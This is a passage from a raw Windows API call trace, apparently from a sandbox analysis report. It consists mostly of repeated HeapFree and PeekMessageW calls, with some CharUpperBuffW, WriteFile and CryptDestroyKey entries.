hHeap=0x2af0000) returned 1 [0124.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0124.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0124.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0124.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0124.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0124.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0124.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0124.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0124.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0124.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0124.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0124.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0124.283] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0124.283] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0124.283] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0124.283] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78368 | out: hHeap=0x2af0000) returned 1 [0124.283] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa258 | out: hHeap=0x2af0000) returned 1 [0124.283] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0124.283] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1b0 | out: hHeap=0x2af0000) returned 1 [0124.283] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0124.283] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0124.283] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa210 | out: hHeap=0x2af0000) returned 1 [0124.283] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fe8 | out: hHeap=0x2af0000) returned 1 [0124.283] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f40 | out: hHeap=0x2af0000) returned 1 [0124.283] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0124.283] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa198 | out: hHeap=0x2af0000) returned 1 [0124.283] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa420 | out: hHeap=0x2af0000) returned 1 [0124.283] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa348 | out: hHeap=0x2af0000) returned 1 [0124.283] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa318 | out: hHeap=0x2af0000) returned 1 [0124.283] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4c8 | out: hHeap=0x2af0000) returned 1 [0124.283] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3a8 | out: hHeap=0x2af0000) returned 1 [0124.283] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa408 | out: hHeap=0x2af0000) returned 1 [0124.283] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa378 | out: hHeap=0x2af0000) returned 1 [0124.283] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa468 | out: hHeap=0x2af0000) returned 1 [0124.283] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3c0 | out: hHeap=0x2af0000) returned 1 [0124.283] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4e0 | out: hHeap=0x2af0000) returned 1 [0124.283] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa480 | out: hHeap=0x2af0000) returned 1 [0124.283] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa498 | out: hHeap=0x2af0000) returned 1 [0124.283] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0124.283] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69730 | out: hHeap=0x2af0000) returned 1 [0124.283] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7040 | out: hHeap=0x2af0000) returned 1 [0124.283] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa390 | out: hHeap=0x2af0000) returned 1 [0124.284] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4f8 | out: hHeap=0x2af0000) returned 1 [0124.284] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4b0 | out: hHeap=0x2af0000) returned 1 [0124.284] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa510 | out: hHeap=0x2af0000) returned 1 [0124.284] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa270 | out: hHeap=0x2af0000) returned 1 [0124.284] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa528 | out: hHeap=0x2af0000) returned 1 [0124.284] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa240 | out: hHeap=0x2af0000) returned 1 [0124.284] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a684e8 | out: hHeap=0x2af0000) returned 1 [0124.284] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0124.284] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2e8 | out: hHeap=0x2af0000) returned 1 [0124.284] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa438 | out: hHeap=0x2af0000) returned 1 [0124.284] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa450 | out: hHeap=0x2af0000) returned 1 [0124.284] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa300 | out: hHeap=0x2af0000) returned 1 [0124.284] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa330 | out: hHeap=0x2af0000) returned 1 [0124.284] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa360 | out: hHeap=0x2af0000) returned 1 [0124.284] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3d8 | out: hHeap=0x2af0000) returned 1 [0124.284] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3f0 | out: hHeap=0x2af0000) returned 1 [0124.284] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78390 | out: hHeap=0x2af0000) returned 1 [0124.284] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0124.284] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aae878 | out: hHeap=0x2af0000) returned 1 [0124.284] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7720 | out: hHeap=0x2af0000) returned 1 [0124.284] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0124.284] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0124.284] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa330 | out: hHeap=0x2af0000) returned 1 [0124.284] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2e8 | out: hHeap=0x2af0000) returned 1 [0124.284] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa480 | out: hHeap=0x2af0000) returned 1 [0124.284] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0124.284] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0124.284] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6e80 | out: hHeap=0x2af0000) returned 1 [0124.284] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0124.284] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0124.284] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0124.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ea40 | out: hHeap=0x2af0000) returned 1 [0124.285] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0124.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0124.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa528 | out: hHeap=0x2af0000) returned 1 [0124.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2e8 | out: hHeap=0x2af0000) returned 1 [0124.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa438 | out: hHeap=0x2af0000) returned 1 [0124.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0124.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0d8 | out: hHeap=0x2af0000) returned 1 [0124.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0124.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa168 | out: hHeap=0x2af0000) returned 1 [0124.285] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0124.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0124.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0124.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f40 | out: hHeap=0x2af0000) returned 1 [0124.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0124.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0124.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0124.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa210 | out: hHeap=0x2af0000) returned 1 [0124.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0124.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69c10 | out: hHeap=0x2af0000) returned 1 [0124.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7020 | out: hHeap=0x2af0000) returned 1 [0124.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1b0 | out: hHeap=0x2af0000) returned 1 [0124.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0d8 | out: hHeap=0x2af0000) returned 1 [0124.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fe8 | out: hHeap=0x2af0000) returned 1 [0124.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0124.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fd0 | out: hHeap=0x2af0000) returned 1 [0124.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0124.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f88 | out: hHeap=0x2af0000) returned 1 [0124.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0124.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0124.285] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0124.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0124.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec80 | out: hHeap=0x2af0000) returned 1 [0124.286] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0124.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7160 | out: hHeap=0x2af0000) returned 1 [0124.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0124.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0124.286] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0124.286] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0124.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78368 | out: hHeap=0x2af0000) returned 1 [0124.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0124.286] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0124.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0124.286] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0124.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78368 | out: hHeap=0x2af0000) returned 1 [0124.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0124.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0124.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0d8 | out: hHeap=0x2af0000) returned 1 [0124.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fd0 | out: hHeap=0x2af0000) returned 1 [0124.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0124.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0124.286] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0124.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0124.286] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0124.286] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0124.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ff8 | out: hHeap=0x2af0000) returned 1 [0124.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0124.286] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0124.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0124.286] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0124.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78368 | out: hHeap=0x2af0000) returned 1 [0124.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0124.287] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fd0 | out: hHeap=0x2af0000) returned 1 [0124.287] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa210 | out: hHeap=0x2af0000) returned 1 [0124.287] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1b0 | out: hHeap=0x2af0000) returned 1 [0124.287] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0124.287] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0124.287] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0124.287] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed40 | out: hHeap=0x2af0000) returned 1 [0124.287] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0124.287] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0124.287] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fd0 | out: hHeap=0x2af0000) returned 1 [0124.287] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0124.287] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0124.287] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0124.287] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0124.287] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0124.287] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0124.287] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0124.287] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0124.287] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0124.287] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0124.287] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0124.287] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0124.287] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0124.287] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0124.287] WriteFile (in: hFile=0x4fc, lpBuffer=0x2a72648*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a72648*, lpNumberOfBytesWritten=0x8cf5e4*=0x8, lpOverlapped=0x0) returned 1 [0124.288] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0124.288] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0124.288] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0124.288] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0124.289] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0124.289] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0124.289] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0124.289] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0124.289] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0124.289] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0124.289] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0124.289] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0124.289] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0124.289] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0124.289] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aa9f40, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0124.289] CryptDestroyKey (hKey=0x9a43c0) returned 1 [0124.289] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0124.289] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0124.289] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0124.289] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0124.289] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0124.289] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0124.289] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0124.290] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0124.290] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0124.290] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0124.290] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0124.290] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0124.290] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0124.290] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0124.343] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0124.343] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0124.343] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0124.343] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0124.343] PeekMessageW (in: 